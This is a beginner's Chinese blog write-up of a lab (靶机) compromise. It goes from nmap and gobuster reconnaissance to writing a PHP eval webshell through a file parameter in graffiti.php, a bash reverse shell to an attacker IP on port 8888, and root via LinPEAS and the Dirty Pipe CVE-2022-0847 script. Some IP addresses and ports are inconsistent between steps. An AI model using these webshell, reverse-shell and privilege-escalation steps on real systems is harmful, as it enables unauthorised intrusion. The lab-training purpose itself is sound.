本文描述了黑客通过nmap扫描识别目标主机,使用gobuster探测文件,发现graffiti.php漏洞,利用PHP木马和反弹shell技术入侵系统,最后借助LinPEAS和CVE-2022-0847实现权限提升的过程。
一、信息搜集
1.nmap 扫描
nmap -sS 10.9.63.0/24
通过nmap扫描存活的主机,确定靶机为10.9.63.42
使用nmap -sV -p- 10.9.63.42确定开放了哪些端口,发现目标开放了22、80、81端口
这个81端口没有用,爆破不了应该是个幌子
2.对目录进行扫描
使用gobuster进行目录扫描,命令:gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -u http://10.9.63.42 对html,php,txt的文件进行扫描的到以下文件
这个扫描一开始我用没有找到因为我只扫描了html的文件没有扫描php和txt的文件导致没有找到graffiti.php文件。
寻找有用的文件在graffiti.php中
在这个页面当中有一个文件漏洞使用抓包工具进行抓包获得两个参数 上传<?php @eval($_GET["sb"]); ?>
使用抓包工具进行抓包,抓包看了下,发现请求包存在两个参数。一个是message,值是我们发送的信息;一个是file,file的值等于graffiti.txt。然后又重新查看了下graffiti.txt这个文件,发现之前测试的数据都被写进了这里
写一个php一句话木马病毒
<?php @eval($_POST["sb"]); ?>
然后就使用蚁剑工具就可以到他的用户当中了
因为我也是刚开始打靶机对很多的工具还是不太了解,所以当时也是看了大佬的攻略
然后使用蚁剑
这里已经是进入了用户中了 但还是看的东西有限 所以需要进行反弹shell获取更多的内容
在这里使用这个网站:https://www.revshells.com/,生成php的反弹shell脚本,然后在kali中开启web服务:python -m http.server,将shell反弹脚本下载到靶机:wget http://172.20.10.7:8000/backShell.php,在web中访问该文件即可获得反弹shell:http://172.20.10.3/backShell.php。
使用php backshell.php运行
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.63.229/8888 0>&1'");?>
这是这里使用的反弹shell脚本
需打开nc -lvnp 8888
需要注意这里没有截图
可以看到我们已经成功反弹
下面的这个技术我也不太懂,是从别的大佬的文章中看到的
LinPEAS
介绍:
LinPEAS 是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。
该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置。
https://github.com/carlospolop/PEASS-ng/releases
这是一个脚本,那就要想办法上传到靶机,因为之前连接过蚁剑,那就使用蚁剑将脚本进行上传。
上传以后就是给这个脚本进行赋权
chmod +x LinPEAS.sh
运行
./LinPEAS.s
检测出来的漏洞
那就使用CVE-2022-0847
在kali上下载
git clone https://github.com/imfiver/CVE-2022-0847.git
然后开启http服务,目的让靶机下载kali的文件。
python3 -m http.server 80
要让Dirty-Pipe.sh这个文件到靶机赋权然后执行
然后靶机下载里面的文件
wget http://192.168.52.134:8080/CVE-2022-0847/Dirty-Pipe.sh
进行赋权
chmod +x Dirty-Pipe.sh
然后执行
./Dirty-Pipe.sh
提权成功
真服了,写了一晚上突然卡了没有保存又重写了一遍
扫一扫
505
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
